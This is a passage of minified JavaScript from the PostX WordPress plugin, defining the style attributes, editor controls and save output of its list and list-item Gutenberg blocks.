}"}]},listIconTypo:{type:"object",default:{openTypography:0,size:{lg:16,unit:"px"},height:{lg:20,unit:"px"},decoration:"none",family:"",weight:700},style:[{depends:[{key:"listLayout",condition:"!=",value:"bullet"},{key:"listGroupIconType",condition:"==",value:"default"}],selector:"{{ULTP}} .ultp-list-texticon:before "}]},listGroupBgSize:{type:"string",default:"",style:[{depends:[{key:"listLayout",condition:"!=",value:"bullet"},{key:"listGroupIconType",condition:"==",value:"default"}],selector:"{{ULTP}} .ultp-list-texticon:before { height:{{listGroupBgSize}}px; width:{{listGroupBgSize}}px; }"},{depends:[{key:"listLayout",condition:"==",value:"bullet"},{key:"listGroupIconType",condition:"==",value:"default"}],selector:"{{ULTP}} .wp-block-ultimate-post-list .ultp-list-texticon { height:{{listGroupBgSize}}px; width:{{listGroupBgSize}}px; }"},{depends:[{key:"listGroupIconType",condition:"!=",value:"default"}],selector:"{{ULTP}} .wp-block-ultimate-post-list .ultp-listicon-bg { height:{{listGroupBgSize}}px; width:{{listGroupBgSize}}px; min-width:{{listGroupBgSize}}px; }"}]},listGroupIconColor:{type:"string",default:"var(--postx_preset_Contrast_1_color)",style:[{depends:[{key:"listGroupIconType",condition:"==",value:"default"},{key:"listLayout",condition:"!=",value:"bullet"}],selector:"{{ULTP}} .ultp-list-texticon:before { color:{{listGroupIconColor}}; }"},{depends:[{key:"listGroupIconType",condition:"==",value:"default"},{key:"listLayout",condition:"==",value:"bullet"}],selector:"{{ULTP}} .ultp-list-texticon:before { background-color:{{listGroupIconColor}}; }"},{depends:[{key:"listGroupIconType",condition:"!=",value:"default"},{key:"listGroupIconType",condition:"!=",value:"image"}],selector:"{{ULTP}} .ultp-listicon-bg svg { color:{{listGroupIconColor}};}"}]},listGroupIconbg:{type:"string",default:"",style:[{depends:[{key:"listLayout",condition:"!=",value:"bullet"},{key:"listGroupIconType",condition:"==",value:"default"}],selector:"{{ULTP}} .ultp-list-texticon:before { background: {{listGroupIconbg}};}"},{depends:[{key:"listLayout",condition:"==",value:"bullet"},{key:"listGroupIconType",condition:"==",value:"default"}],selector:"{{ULTP}} .wp-block-ultimate-post-list .ultp-list-texticon { background: {{listGroupIconbg}};}"},{depends:[{key:"listGroupIconType",condition:"!=",value:"default"}],selector:"{{ULTP}} .wp-block-ultimate-post-list .ultp-listicon-bg { background: {{listGroupIconbg}};}"}]},listGroupIconBorder:{type:"object",default:{openBorder:0,width:{top:2,right:2,bottom:2,left:2},color:"#dfdfdf"},style:[{depends:[{key:"listLayout",condition:"!=",value:"bullet"},{key:"listGroupIconType",condition:"==",value:"default"}],selector:"{{ULTP}} .ultp-list-texticon:before"},{depends:[{key:"listLayout",condition:"==",value:"bullet"},{key:"listGroupIconType",condition:"==",value:"default"}],selector:"{{ULTP}} .wp-block-ultimate-post-list .ultp-list-texticon"},{depends:[{key:"listGroupIconType",condition:"!=",value:"default"}],selector:"{{ULTP}} .wp-block-ultimate-post-list .ultp-listicon-bg"}]},listGroupIconRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"listLayout",condition:"!=",value:"bullet"},{key:"listGroupIconType",condition:"==",value:"default"}],selector:"{{ULTP}} .ultp-list-texticon:before { border-radius: {{listGroupIconRadius}}; }"},{depends:[{key:"listLayout",condition:"==",value:"bullet"},{key:"listGroupIconType",condition:"==",value:"default"}],selector:"{{ULTP}} .wp-block-ultimate-post-list .ultp-list-texticon { border-radius: {{listGroupIconRadius}}; }"},{depends:[{key:"listGroupIconType",condition:"!=",value:"default"}],selector:"{{ULTP}} .wp-block-ultimate-post-list .ultp-listicon-bg { border-radius: {{listGroupIconRadius}}; }"}]},listGroupHoverIconColor:{type:"string",default:"",style:[{depends:[{key:"listLayout",condition:"!=",value:"bullet"},{key:"listGroupIconType",condition:"==",value:"default"}],selector:"{{ULTP}} .wp-block-ultimate-post-list:hover .ultp-list-texticon:before  { color:{{listGroupHoverIconColor}}; }"},{depends:[{key:"listLayout",condition:"==",value:"bullet"},{key:"listGroupIconType",condition:"==",value:"default"}],selector:"{{ULTP}} .wp-block-ultimate-post-list:hover .ultp-list-texticon:before  { background-color:{{listGroupHoverIconColor}}; }"},{depends:[{key:"listGroupIconType",condition:"!=",value:"default"},{key:"listGroupIconType",condition:"!=",value:"image"}],selector:"{{ULTP}} .wp-block-ultimate-post-list:hover .ultp-listicon-bg svg { color:{{listGroupHoverIconColor}};}"}]},listGroupHoverIconbg:{type:"string",default:"",style:[{depends:[{key:"listLayout",condition:"!=",value:"bullet"},{key:"listGroupIconType",condition:"==",value:"default"}],selector:"{{ULTP}} .block-editor-block-list__block:hover .wp-block-ultimate-post-list .ultp-list-texticon:before ,\n                {{ULTP}} .ultp-list-wrapper  > .wp-block-ultimate-post-list:hover .ultp-list-texticon:before  { background: {{listGroupHoverIconbg}}; }"},{depends:[{key:"listLayout",condition:"==",value:"bullet"},{key:"listGroupIconType",condition:"==",value:"default"}],selector:"{{ULTP}} .wp-block-ultimate-post-list:hover .ultp-list-texticon { background: {{listGroupHoverIconbg}}; }"},{depends:[{key:"listGroupIconType",condition:"!=",value:"default"}],selector:"{{ULTP}} .wp-block-ultimate-post-list:hover .ultp-listicon-bg { background: {{listGroupHoverIconbg}}; }"}]},listGroupHoverIconBorder:{type:"object",default:{openBorder:0,width:{top:2,right:2,bottom:2,left:2},color:"#dfdfdf"},style:[{depends:[{key:"listLayout",condition:"!=",value:"bullet"},{key:"listGroupIconType",condition:"==",value:"default"}],selector:"{{ULTP}} .block-editor-block-list__block:hover .wp-block-ultimate-post-list .ultp-list-texticon:before, \n                {{ULTP}} .ultp-list-wrapper  > .wp-block-ultimate-post-list:hover .ultp-list-texticon:before "},{depends:[{key:"listLayout",condition:"==",value:"bullet"},{key:"listGroupIconType",condition:"==",value:"default"}],selector:"{{ULTP}} .wp-block-ultimate-post-list:hover .ultp-list-texticon"},{depends:[{key:"listGroupIconType",condition:"!=",value:"default"}],selector:"{{ULTP}} .wp-block-ultimate-post-list:hover .ultp-listicon-bg"}]},listGroupHoverIconRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"listLayout",condition:"!=",value:"bullet"},{key:"listGroupIconType",condition:"==",value:"default"}],selector:"{{ULTP}} .block-editor-block-list__block:hover .wp-block-ultimate-post-list .ultp-list-texticon:before , \n                {{ULTP}} .ultp-list-wrapper  > .wp-block-ultimate-post-list:hover .ultp-list-texticon:before  { border-radius: {{listGroupHoverIconRadius}}; }"},{depends:[{key:"listLayout",condition:"==",value:"bullet"},{key:"listGroupIconType",condition:"==",value:"default"}],selector:"{{ULTP}} .wp-block-ultimate-post-list:hover .ultp-list-texticon { border-radius: {{listGroupHoverIconRadius}}; }"},{depends:[{key:"listGroupIconType",condition:"!=",value:"default"}],selector:"{{ULTP}} .wp-block-ultimate-post-list:hover .ultp-listicon-bg { border-radius: {{listGroupHoverIconRadius}}; }"}]},listDisableText:{type:"boolean",default:!1,style:[{depends:[{key:"listDisableText",condition:"==",value:!1}]},{depends:[{key:"listDisableText",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-list-content { display: block !important; }"}]},listTextTypo:{type:"object",default:{openTypography:1,size:{lg:16,unit:"px"},height:{lg:"24",unit:"px"},decoration:"none",family:"",weight:400},style:[{selector:"{{ULTP}}  .ultp-list-title,\n            {{ULTP}}  .ultp-list-title a"}]},listGroupTitleColor:{type:"string",default:"var(--postx_preset_Contrast_1_color)",style:[{selector:"{{ULTP}} .ultp-list-title,\n            {{ULTP}} .ultp-list-title a { color: {{listGroupTitleColor}}; }"}]},listGroupTitleHoverColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{selector:"{{ULTP}} .ultp-list-wrapper  > .wp-block-ultimate-post-list:hover .ultp-list-title,\n            {{ULTP}} .ultp-list-wrapper  > .wp-block-ultimate-post-list:hover .ultp-list-title a,\n            {{ULTP}} .block-editor-block-list__block:hover > .wp-block-ultimate-post-list .ultp-list-title,\n            {{ULTP}} .block-editor-block-list__block:hover > .wp-block-ultimate-post-list .ultp-list-title a { color: {{listGroupTitleHoverColor}}; }"}]},listGroupSubtextEnable:{type:"boolean",default:!1,style:[{depends:[{key:"layout",condition:"==",value:"layout1"}],selector:'{{ULTP}} .wp-block-ultimate-post-list .ultp-list-content { display: grid; grid-template-areas: "a b" "a c"; align-items: center; }'},{depends:[{key:"layout",condition:"==",value:"layout2"}],selector:'{{ULTP}} .wp-block-ultimate-post-list .ultp-list-content { display: grid; grid-template-areas: "b a" "c a"; align-items: center; justify-content: flex-end; }'},{depends:[{key:"layout",condition:"==",value:"layout3"}],selector:"{{ULTP}} .wp-block-ultimate-post-list .ultp-list-content { display: block !important; }"}]},listGroupSubtextTypo:{type:"object",default:{openTypography:1,size:{lg:14,unit:"px"},height:{lg:"20",unit:"px"},decoration:"none",family:"",weight:400},style:[{depends:[{key:"listGroupSubtextEnable",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-list-subtext"}]},listGroupSubtextSpace:{type:"object",default:{lg:"5",ulg:"px"},style:[{depends:[{key:"listGroupSubtextEnable",condition:"==",value:!0},{key:"layout",condition:"==",value:"layout3"}],selector:"{{ULTP}} .ultp-list-subtext { margin-top:{{listGroupSubtextSpace}}; }"},{depends:[{key:"listGroupSubtextEnable",condition:"==",value:!0},{key:"listGroupBelowIcon",condition:"==",value:!0},{key:"layout",condition:"!=",value:"layout3"}],selector:"{{ULTP}} .ultp-list-subtext { margin-top:{{listGroupSubtextSpace}}; }"},{depends:[{key:"listGroupBelowIcon",condition:"==",value:!1},{key:"layout",condition:"!=",value:"layout3"},{key:"listGroupSubtextEnable",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-list-content { row-gap:{{listGroupSubtextSpace}}; }\n                {{ULTP}} .ultp-list-title,\n                {{ULTP}} .ultp-list-content a { align-self: self-end; }\n                {{ULTP}} .ultp-list-subtext { align-self: self-start; }"}]},listGroupSubtextColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"listGroupSubtextEnable",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-list-subtext { color:{{listGroupSubtextColor}}; }"}]},listGroupSubtextHoverColor:{type:"string",default:"",style:[{depends:[{key:"listGroupSubtextEnable",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-list-wrapper  > .wp-block-ultimate-post-list:hover .ultp-list-subtext, \n            {{ULTP}} .block-editor-block-list__block:hover > .wp-block-ultimate-post-list .ultp-list-subtext  { color:{{listGroupSubtextHoverColor}}; }"}]},listGroupBelowIcon:{type:"boolean",default:!1,style:[{depends:[{key:"listGroupBelowIcon",condition:"==",value:!0},{key:"listGroupSubtextEnable",condition:"==",value:!0},{key:"layout",condition:"==",value:"layout3"}],selector:"{{ULTP}} .wp-block-ultimate-post-list .ultp-list-content { display: block !important; }"},{depends:[{key:"listGroupBelowIcon",condition:"==",value:!0},{key:"listGroupSubtextEnable",condition:"==",value:!0},{key:"layout",condition:"!=",value:"layout3"}],selector:"{{ULTP}} .wp-block-ultimate-post-list .ultp-list-content { display: block !important; }"},{depends:[{key:"listGroupSubtextEnable",condition:"==",value:!0},{key:"listGroupBelowIcon",condition:"==",value:!1},{key:"layout",condition:"!=",value:"layout3"}]}]},listGroupBg:{type:"object",default:{openColor:0,type:"color",color:"var(--postx_preset_Base_2_color)",size:"cover",repeat:"no-repeat"},style:[{depends:[{key:"listGroupIconType",condition:"==",value:"default"}],selector:"{{ULTP}} .wp-block-ultimate-post-list .ultp-list-content"},{depends:[{key:"listGroupIconType",condition:"!=",value:"default"}],selector:"{{ULTP}} .wp-block-ultimate-post-list .ultp-list-content"}]},listGroupborder:{type:"object",default:{openBorder:0,width:{top:2,right:2,bottom:2,left:2},color:"#dfdfdf"},style:[{depends:[{key:"listGroupIconType",condition:"==",value:"default"}],selector:"{{ULTP}} .wp-block-ultimate-post-list .ultp-list-content"},{depends:[{key:"listGroupIconType",condition:"!=",value:"default"}],selector:"{{ULTP}} .wp-block-ultimate-post-list .ultp-list-content"}]},listGroupRadius:{type:"object",default:{lg:{top:2,right:2,bottom:2,left:2,unit:"px"},unit:"px"},style:[{depends:[{key:"listGroupIconType",condition:"==",value:"default"}],selector:"{{ULTP}} .wp-block-ultimate-post-list .ultp-list-content { border-radius: {{listGroupRadius}};}"},{depends:[{key:"listGroupIconType",condition:"!=",value:"default"}],selector:"{{ULTP}} .wp-block-ultimate-post-list .ultp-list-content { border-radius: {{listGroupRadius}};}"}]},listGroupPadding:{type:"object",default:{lg:{top:"2",bottom:"2",left:"6",right:"6",unit:"px"}},style:[{depends:[{key:"listGroupIconType",condition:"==",value:"default"}],selector:"{{ULTP}} .wp-block-ultimate-post-list  .ultp-list-content { padding: {{listGroupPadding}}; }"},{depends:[{key:"listGroupIconType",condition:"!=",value:"default"}],selector:"{{ULTP}} .wp-block-ultimate-post-list .ultp-list-content { padding: {{listGroupPadding}}; }"}]},listGroupHoverBg:{type:"object",default:{openColor:0,type:"color",color:"#f5f5f5",size:"cover",repeat:"no-repeat"},style:[{depends:[{key:"listGroupIconType",condition:"==",value:"default"}],selector:"{{ULTP}} .wp-block-ultimate-post-list .ultp-list-content:hover"},{depends:[{key:"listGroupIconType",condition:"!=",value:"default"}],selector:"{{ULTP}} .wp-block-ultimate-post-list .ultp-list-content:hover"}]},listGroupHovborder:{type:"object",default:{openBorder:0,width:{top:2,right:2,bottom:2,left:2},color:"#dfdfdf"},style:[{depends:[{key:"listGroupIconType",condition:"==",value:"default"}],selector:"{{ULTP}} .wp-block-ultimate-post-list .ultp-list-content:hover"},{depends:[{key:"listGroupIconType",condition:"!=",value:"default"}],selector:"{{ULTP}} .wp-block-ultimate-post-list .ultp-list-content:hover"}]},listGroupHovRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"listGroupIconType",condition:"==",value:"default"}],selector:"{{ULTP}} .wp-block-ultimate-post-list .ultp-list-content:hover { border-radius: {{listGroupHovRadius}};}"},{depends:[{key:"listGroupIconType",condition:"!=",value:"default"}],selector:"{{ULTP}} .wp-block-ultimate-post-list .ultp-list-content:hover { border-radius: {{listGroupHovRadius}};}"}]},enableSeparator:{type:"boolean",default:!1},listGroupSepColor:{type:"string",default:"var(--postx_preset_Base_3_color)",style:[{depends:[{key:"enableSeparator",condition:"==",value:!0}],selector:"{{ULTP}} ul li { border-color: {{listGroupSepColor}}; }"}]},listGroupSepSize:{type:"string",default:"",style:[{depends:[{key:"listInline",condition:"==",value:!0},{key:"enableSeparator",condition:"==",value:!0}],selector:"{{ULTP}} ul  li { border-right-width: {{listGroupSepSize}}px; }"},{depends:[{key:"enableSeparator",condition:"==",value:!0},{key:"listInline",condition:"==",value:!1}],selector:"{{ULTP}} ul  li { border-bottom-width: {{listGroupSepSize}}px; }"}]},listGroupSepStyle:{type:"string",default:"solid",style:[{depends:[{key:"listInline",condition:"==",value:!0},{key:"enableSeparator",condition:"==",value:!0}],selector:"{{ULTP}} ul li { border-right-style: {{listGroupSepStyle}}; }"},{depends:[{key:"listInline",condition:"==",value:!1},{key:"enableSeparator",condition:"==",value:!0}],selector:"{{ULTP}} ul li { border-bottom-style: {{listGroupSepStyle}}; }"}]},wrapBg:{type:"object",default:{openColor:0,type:"color",color:"#f5f5f5"},style:[{selector:"{{ULTP}} .ultp-list-wrapper:has(> .wp-block-ultimate-post-list),\n            {{ULTP}} .ultp-list-wrapper > .block-editor-inner-blocks .block-editor-block-list__layout"}]},wrapBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{selector:"{{ULTP}} .ultp-list-wrapper:has(> .wp-block-ultimate-post-list),\n            {{ULTP}} .ultp-list-wrapper > .block-editor-inner-blocks .block-editor-block-list__layout"}]},wrapShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{selector:"{{ULTP}} .ultp-list-wrapper:has(> .wp-block-ultimate-post-list),\n            {{ULTP}} .ultp-list-wrapper > .block-editor-inner-blocks .block-editor-block-list__layout"}]},wrapRadius:{type:"object",default:{lg:"",unit:"px"},style:[{selector:"{{ULTP}} .ultp-list-wrapper:has(> .wp-block-ultimate-post-list),\n            {{ULTP}} .ultp-list-wrapper > .block-editor-inner-blocks .block-editor-block-list__layout { border-radius:{{wrapRadius}}; }"}]},wrapHoverBackground:{type:"object",default:{openColor:0,type:"color",color:"#037fff"},style:[{selector:"{{ULTP}} .ultp-list-wrapper:has(> .wp-block-ultimate-post-list):hover,\n            {{ULTP}} .ultp-list-wrapper > .block-editor-inner-blocks .block-editor-block-list__layout:hover"}]},wrapHoverBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{selector:"{{ULTP}} .ultp-list-wrapper:has(> .wp-block-ultimate-post-list):hover,\n            {{ULTP}} .ultp-list-wrapper > .block-editor-inner-blocks .block-editor-block-list__layout:hover"}]},wrapHoverRadius:{type:"object",default:{lg:"",unit:"px"},style:[{selector:"{{ULTP}} .ultp-list-wrapper:has(> .wp-block-ultimate-post-list):hover,\n            {{ULTP}} .ultp-list-wrapper > .block-editor-inner-blocks .block-editor-block-list__layout:hover { border-radius:{{wrapHoverRadius}}; }"}]},wrapHoverShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{selector:"{{ULTP}} .ultp-list-wrapper:has(> .wp-block-ultimate-post-list):hover,\n            {{ULTP}} .ultp-list-wrapper > .block-editor-inner-blocks .block-editor-block-list__layout:hover"}]},wrapMargin:{type:"object",default:{lg:{top:"",bottom:"",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-list-wrapper:has(> .wp-block-ultimate-post-list),\n            {{ULTP}} .ultp-list-wrapper > .block-editor-inner-blocks .block-editor-block-list__layout { margin:{{wrapMargin}}; }"}]},wrapOuterPadding:{type:"object",default:{lg:{top:"",bottom:"",left:"",right:"",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-list-wrapper:has(> .wp-block-ultimate-post-list),\n            {{ULTP}} .ultp-list-wrapper > .block-editor-inner-blocks .block-editor-block-list__layout { padding:{{wrapOuterPadding}}; }"}]},advanceId:{type:"string",default:""},advanceZindex:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-list-wrapper { z-index:{{advanceZindex}}; }"}]},hideExtraLarge:{type:"boolean",default:!1,style:[{selector:"{{ULTP}} {display:none;}"}]},hideTablet:{type:"boolean",default:!1,style:[{selector:"{{ULTP}} {display:none;}"}]},hideMobile:{type:"boolean",default:!1,style:[{selector:"{{ULTP}} {display:none;}"}]},advanceCss:{type:"string",default:"",style:[{selector:""}]}}},43053:(e,t,l)=>{"use strict";var o=l(67294),a=l(83100),i=l(43166),n=l(36988),r=l(65839),s=l(82402);const{__}=wp.i18n,{registerBlockType:p,createBlock:c}=wp.blocks,u=(0,a.Z)("https://wpxpo.com/docs/postx/all-blocks/list-block/","block_docs");p(s,{icon:(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/advanced-list.svg",alt:"List PostX"}),description:(0,o.createElement)("span",{className:"ultp-block-info"},__("Create & customize bullets and numbered lists.","ultimate-post"),(0,o.createElement)("a",{target:"_blank",href:u,rel:"noreferrer"},__("Documentation","ultimate-post"))),attributes:r.Z,example:{attributes:{previewImg:ultp_data.url+"assets/img/preview/list.svg"}},transforms:{from:[{type:"block",blocks:["core/list"],transform:()=>c("ultimate-post/advanced-list",{previewImg:ultp_data.url+"assets/img/preview/list.svg"})}]},edit:i.Z,save:n.Z})},67532:(e,t,l)=>{"use strict";l.d(t,{Z:()=>w});var o=l(67294),a=l(53049),i=l(99838),n=l(41557),r=l(69735),s=l(64766),p=l(17151);const{__}=wp.i18n,{InspectorControls:c,RichText:u,useBlockProps:d}=wp.blockEditor,{useState:m,useEffect:g,Fragment:y}=wp.element,{Dropdown:b}=wp.components,{createBlock:v}=wp.blocks,{select:h}=wp.data,{getBlockAttributes:f,getBlockRootClientId:k}=wp.data.select("core/block-editor");function w(e){const[t,l]=m("Content"),{setAttributes:w,className:x,name:T,attributes:_,clientId:C,attributes:{blockId:E,advanceId:S,listText:P,listCustomImg:L,listIconType:I,subtext:B,listSinleCustomIcon:U,dcEnabled:M,currentPostId:A}}=e;g((()=>{const e=C.substr(0,6),t=f(k(C));(0,a.qi)(w,t,A,C),E?E&&E!=e&&(t?.hasOwnProperty("ref")||(0,a.k0)()||t?.hasOwnProperty("theme")||w({blockId:e})):w({blockId:e})}),[C]);const H={setAttributes:w,name:T,attributes:_,setSection:l,section:t,clientId:C};let N;E&&(N=(0,i.Kh)(_,"ultimate-post/list",E,(0,a.k0)()));const j=h("core/block-editor").getBlockParents(C),Z=h("core/block-editor").getBlockAttributes(j[j.length-1]),{listGroupCustomImg:O,listGroupIconType:R,listDisableText:D,layout:z,listGroupSubtextEnable:F,listGroupBelowIcon:W,listCustomIcon:V,enableIcon:G,listLayout:q}=Z;g((()=>{w({listGroupCustomImg:O,listGroupIconType:R,listDisableText:D,listGroupBelowIcon:W,listGroupSubtextEnable:F,listCustomIcon:V,layout:z,enableIcon:G,listLayout:q})}),[z,G,q,V,D,R,W,O,F]);const $=W&&"layout3"!=z?"div":y;function K(e){return"default"!=R&&(I==e||"inherit"==I&&R==e)||""==I&&R==e}const J=K("image"),Y=K("icon"),X=d({...S&&{id:S},className:`ultp-block-${E} ${x}`});return(0,o.createElement)(y,null,(0,o.createElement)(c,null,(0,o.createElement)(p.Z,{store:H})),(0,o.createElement)("li",X,N&&(0,o.createElement)("style",{dangerouslySetInnerHTML:{__html:N}}),(0,o.createElement)("div",{className:"ultp-list-content"},(0,o.createElement)($,W&&"layout3"!=z&&{class:"ultp-list-heading"},"default"==R&&G&&(0,o.createElement)("div",{className:"ultp-list-texticon ultp-listicon-bg"}),J&&G&&(0,o.createElement)("div",{className:"ultp-listicon-bg"},(0,o.createElement)("img",{src:L.url&&"inherit"!=I?L.url:O.url,alt:"List Image"})),Y&&G&&(0,o.createElement)(b,{popoverProps:{placement:"bottom-start"},className:"ultp-listicon-dropdown",renderToggle:({onToggle:e,onClose:t})=>(0,o.createElement)("div",{onClick:()=>e(),className:"ultp-listicon-bg"},s.ZP[U.length>0&&"inherit"!=I?U:V]),renderContent:()=>(0,o.createElement)(n.Z,{inline:!0,value:U,label:"Update Single Icon",dynamicClass:" ",onChange:e=>H.setAttributes({listSinleCustomIcon:e,listIconType:"icon"})})}),!D&&(0,o.createElement)(u,{key:"editable",tagName:"div",className:"ultp-list-title",placeholder:__("List Text…","ultimate-post"),onChange:e=>w({listText:e}),allowedFormats:(0,r.o6)()&&M?["ultimate-post/dynamic-content"]:void 0,onReplace:(e,t,l)=>wp.data.dispatch("core/block-editor").replaceBlocks(C,e,t,l),onSplit:(e,t)=>v("ultimate-post/list",{..._,listText:e}),value:P})),!D&&F&&(0,o.createElement)("div",{className:"ultp-list-subtext"},(0,o.createElement)(u,{key:"editable",tagName:"span",placeholder:__("List Subtext Text…","ultimate-post"),onChange:e=>w({subtext:e}),value:B})))))}},36681:(e,t,l)=>{"use strict";l.d(t,{Z:()=>n});var o=l(67294);const{Fragment:a}=wp.element,{useBlockProps:i}=wp.blockEditor;function n(e){const{attributes:{blockId:t,advanceId:l,listText:n,listCustomImg:r,listIconType:s,listGroupSubtextEnable:p,subtext:c,listGroupCustomImg:u,listGroupIconType:d,listDisableText:m,listGroupBelowIcon:g,listCustomIcon:y,listSinleCustomIcon:b,layout:v,enableIcon:h}}=e,f=g&&"layout3"!=v?"div":a;function k(e){return"default"!=d&&(s==e||"inherit"==s&&d==e)||""==s&&d==e}const w=k("image"),x=k("icon"),T=i.save({...l&&{id:l},className:`ultp-block-${t}`});return(0,o.createElement)("li",T,(0,o.createElement)("div",{className:"ultp-list-content"},(0,o.createElement)(f,g&&"layout3"!=v&&{class:"ultp-list-heading"},"default"==d&&h&&(0,o.createElement)("div",{className:"ultp-list-texticon ultp-listicon-bg"}),w&&h&&(0,o.createElement)("div",{className:"ultp-listicon-bg"},(0,o.createElement)("img",{src:r.url?r.url:u.url,alt:"List Image"})),x&&h&&(0,o.createElement)("div",{className:"ultp-listicon-bg"},"_ultp_list_ic_"+(b.length>0&&"inherit"!=s?b:y)+"_ultp_list_ic_end_"),!m&&(0,o.createElement)("div",{className:"ultp-list-title",dangerouslySetInnerHTML:{__html:n}})),!m&&p&&(0,o.createElement)("div",{className:"ultp-list-subtext",dangerouslySetInnerHTML:{__html:c}})))}},17151:(e,t,l)=>{"use strict";l.d(t,{Z:()=>n});var o=l(67294),a=l(53049),i=l(92637);const{__}=wp.i18n,n=({store:e})=>(0,o.createElement)(i.Sections,null,(0,o.createElement)(i.Section,{slug:"button",title:__("Button","ultimate-post")},(0,o.createElement)(a.T,{title:"inline",include:[{position:1,data:{type:"tag",key:"listIconType",label:__("Icon Type","ultimate-post"),options:[{value:"icon",label:__("Icon","ultimate-post")},{value:"image",label:__("Image","ultimate-post")},{value:"inherit",label:__("Inherit","ultimate-post")},{value:"none",label:__("None","ultimate-post")}]}},{position:2,data:{type:"icon",key:"listSinleCustomIcon",label:__("Icon Store","ultimate-post")}},{position:3,data:{type:"media",key:"listCustomImg",label:__("Upload Custom Image","ultimate-post")}},{position:4,data:{type:"separator",label:__("Icon Style","ultimate-post")}},{position:5,data:{type:"tab",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"color",key:"listIconColor",label:__("Icon Color","ultimate-post")},{type:"color",key:"listIconBg",label:__("Icon  Background","ultimate-post")},{type:"border",key:"listIconBorder",label:__("Border","ultimate-post")}]},{name:"hover",title:__("Hover","ultimate-post"),options:[{type:"color",key:"listIconHoverColor",label:__("Icon Hover Color","ultimate-post")},{type:"color",key:"listIconHoverBg",label:__("Icon Hover Background","ultimate-post")},{type:"border",key:"listIconHoverBorder",label:__("Hover Border","ultimate-post")}]}]}}],initialOpen:!0,store:e}),(0,o.createElement)(a.T,{title:__("Text","ultimate-post"),include:[{position:1,data:{type:"color",key:"listTextColor",label:__("Title Color","ultimate-post")}},{position:2,data:{type:"color",key:"listTextHoverColor",label:__("Title Hover Color","ultimate-post")}},{position:3,data:{type:"separator",key:"separator",label:__("Subtext","ultimate-post")}},{position:4,data:{type:"range",key:"subTextSpace",min:0,max:400,step:1,responsive:!0,label:__("Space Between Text & Subtext","ultimate-post"),unit:["px"]}},{position:5,data:{type:"color",key:"subTextColor",label:__("Subtext Color","ultimate-post")}},{position:9,data:{type:"color",key:"listSubtextHoverColor",label:__("Subtext Hover Color","ultimate-post")}}],initialOpen:!1,store:e})),(0,o.createElement)(i.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(a.Mg,{store:e}),(0,o.createElement)(a.iv,{store:e})))},87383:(e,t,l)=>{"use strict";l.d(t,{Z:()=>o});const o={blockId:{type:"string",default:""},currentPostId:{type:"string",default:""},layout:{type:"string",default:""},listGroupCustomImg:{type:"object",default:""},listGroupIconType:{type:"string",default:""},listDisableText:{type:"boolean",default:!0},listCustomIcon:{type:"string",default:""},listGroupSubtextEnable:{type:"boolean",default:!0},listGroupBelowIcon:{type:"boolean",default:!1},enableIcon:{type:"boolean",default:!0},listLayout:{type:"string",default:"number"},listText:{type:"string",default:""},listIconType:{type:"string",default:"",style:[{depends:[{key:"enableIcon",condition:"==",value:!0},{key:"listGroupIconType",condition:"!=",value:"default"}]}]},listSinleCustomIcon:{type:"string",default:"",style:[{depends:[{key:"listGroupIconType",condition:"!=",value:"default"},{key:"listIconType",condition:"==",value:"icon"}]}]},listCustomImg:{type:"object",default:"",style:[{depends:[{key:"listGroupIconType",condition:"!=",value:"default"},{key:"listIconType",condition:"==",value:"image"}]}]},listIconColor:{type:"string",default:"",style:[{depends:[{key:"listLayout",condition:"!=",value:"bullet"},{key:"listGroupIconType",condition:"==",value:"default"}],selector:"{{ULTP}}.wp-block-ultimate-post-list .ultp-list-texticon:before { color:{{listIconColor}}; }"},{depends:[{key:"listLayout",condition:"==",value:"bullet"},{key:"listGroupIconType",condition:"==",value:"default"}],selector:"{{ULTP}}.wp-block-ultimate-post-list .ultp-list-texticon:before { background-color:{{listIconColor}}; }"},{depends:[{key:"listGroupIconType",condition:"!=",value:"default"}],selector:"{{ULTP}} .ultp-listicon-bg svg { color:{{listIconColor}}; }"}]},listIconBg:{type:"string",default:"",style:[{depends:[{key:"listLayout",condition:"!=",value:"bullet"},{key:"listGroupIconType",condition:"==",value:"default"}],selector:"{{ULTP}}.wp-block-ultimate-post-list .ultp-list-texticon:before { background: {{listIconBg}};}"},{depends:[{key:"listLayout",condition:"==",value:"bullet"},{key:"listGroupIconType",condition:"==",value:"default"}],selector:"{{ULTP}}.wp-block-ultimate-post-list .ultp-list-texticon { background: {{listIconBg}};}"},{depends:[{key:"listGroupIconType",condition:"!=",value:"default"}],selector:"{{ULTP}}.wp-block-ultimate-post-list .ultp-listicon-bg { background: {{listIconBg}};}"}]},listIconBorder:{type:"object",default:{openBorder:0,width:{top:2,right:2,bottom:2,left:2},color:"#dfdfdf"},style:[{depends:[{key:"listLayout",condition:"!=",value:"bullet"},{key:"listGroupIconType",condition:"==",value:"default"}],selector:"{{ULTP}}.wp-block-ultimate-post-list .ultp-list-texticon:before"},{depends:[{key:"listLayout",condition:"==",value:"bullet"},{key:"listGroupIconType",condition:"==",value:"default"}],selector:"{{ULTP}}.wp-block-ultimate-post-list .ultp-list-texticon"},{depends:[{key:"listGroupIconType",condition:"!=",value:"default"}],selector:"{{ULTP}}.wp-block-ultimate-post-list 